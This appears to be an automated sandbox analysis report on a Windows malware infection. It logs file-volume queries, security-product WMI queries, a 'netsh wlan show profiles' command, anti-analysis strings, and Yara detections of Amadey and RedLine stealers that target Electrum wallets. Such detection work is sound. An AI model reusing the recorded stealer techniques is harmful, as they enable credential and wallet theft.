Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\explorer.exe

Code function: 4_2_0984671C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,

4_2_0984671C

Source: C:\Windows\explorer.exe

Code function: 4_2_09835570 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,

4_2_09835570

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe

Code function: 11_2_00007FF69003518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

11_2_00007FF69003518C

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E3833EC GetVersionExW,

0_2_00007FF79E3833EC

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: procmon.exe
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: procexp.exe
Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exe	Binary or memory string: autoruns.exe

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 19.2.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.EC2F.tmp.gfx.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.rundll32.exe.69710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.rundll32.exe.69710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.EC2F.tmp.gfx.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\walletsLRjq
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
